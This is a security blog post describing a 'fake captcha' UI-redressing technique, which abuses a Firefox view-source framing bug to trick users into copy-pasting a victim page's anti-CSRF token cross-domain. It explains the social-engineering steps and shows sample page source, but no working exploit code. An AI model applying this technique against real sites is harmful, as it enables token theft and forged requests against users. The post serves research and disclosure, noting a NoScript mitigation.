Cross domain content extraction with fake captcha

 

Content extraction is one of the recently documented UI redressing vectors. It exploits Firefox vulnerability that allows to display any URL HTML source in an iframe like this:
 

1

With social engineering attacker tricks user into selecting (usually invisible) page source and dragging it to attackers' controlled textarea. A simple demo is here:

 

Drag & drop other page source (cross-domain)

Once attacker gets the page source dropped into his textarea, he may begin to extract contents (like session IDs, user names, anti csrf tokens etc.) and launch further attacks.

However, this way of using the vector requires significant effort from a user and is pretty difficult to exploit in real world situation (there's some clicking and dragging involved). Also, it will stop working once Mozilla disallows cross origin drag & dropping.

I've found a neat way to do cross-origin content extraction that might be more suitable for some classes of websites. Ladies and gentleman, let me present Fake Captcha:
 

NO MORE DRAG

The weak point of the 'classic' method for me was the dragging that was involved. In Firefox, once you drag something, it displays a shadow of the object at the cursor - and a whole HTML source being displayed for the user is really hard to hide. I decided to convince the user to copy & paste the source with his clipboard instead.

Copying & pasting requires four steps:
 

  1. selecting the text to copy

  2. ctrl-c

  3. navigating to target element

  4. ctrl-v

Each of these steps requires user intervention. I could make a game/quiz that requires certain keypresses, but that's weak (although it works for Facebook users). Instead, I wanted it to feel natural for the user. Nothing is hidden and he just uses the clipboard because he wants to.
 

SO, WHEN DO YOU USE A CLIPBOARD?

Well, I don't like typing. So everytime I'm forced to repeat my e-mail address in a form, I just copypaste it. I decided to go that way. What if we display longish captcha-like 'security code' for a user to retype? 16 characters or more? Some of them will skip this step altogether, some will retype, but most will select the text and copy/paste.

 

HOW DO YOU SELECT?

You can select with your mouse. In Firefox, you can also select by double / tripple clicking. My assumption is that most of the users use the clicking method to select text.

Double click stops at word boundary, third click expands to whole paragraph (try this text). In the above example, you need three clicks to select the whole visible code. Why do we care?
 

I'M FRAMED!

Because the security code input field is just precisely positioned part of the view-source:d victim page. And by tripple clicking user selects the whole line from the page source!

 

DEMO

It's best to see the demo to understand what's going on. We want to extract the anti-CSRF token from the victim page cross domain. The token is in the page source, line 7:
 

1

2

3

4

5

6

7

8

9

10

11

12

13

14

15

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">

<html>

<head>

<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">

<title>NDCP</title>

<script type="text/javascript">

var csrf_token = '35fb6df6-2ab9-408b-abe3-769412a58e15';

</script>

<style>

body {

    background: url(nuke.jpg) left top repeat;

    color: white;

    font-family: Verdana, arial, sans-serif;

}

// and so on


So we display the source in a small frame, position it to only display a few characters, starting from line 7, column 19. Then we convince the user to select the whole line with tripple click - double click will stop at minus sign, so the user will probably do the third click to select all.
After selecting he copies, clicks the next field and pastes. Then we're done.
 

DETAILS MATTER

See the source to appreciate all the small, but very important details, especially:
 

HOW NOT TO GET OWNED?

SUMMARY

There's a new 'fake captcha' method of using the content extraction UI redressing vector.

Pros:
 

Cons:
 

You might find the requirements very limiting. I also thought that's simply impossible to exploit in real life. Until I started looking - wait for the next post :)

Update: Latest NoScript (2.1.2+) contains code neutralizing fake captcha method. Yeat another great work of Giorgio Maone!

Update 2: Fake CAPTCHA technique spotted in the wild to extract Facebook CSRF tokens.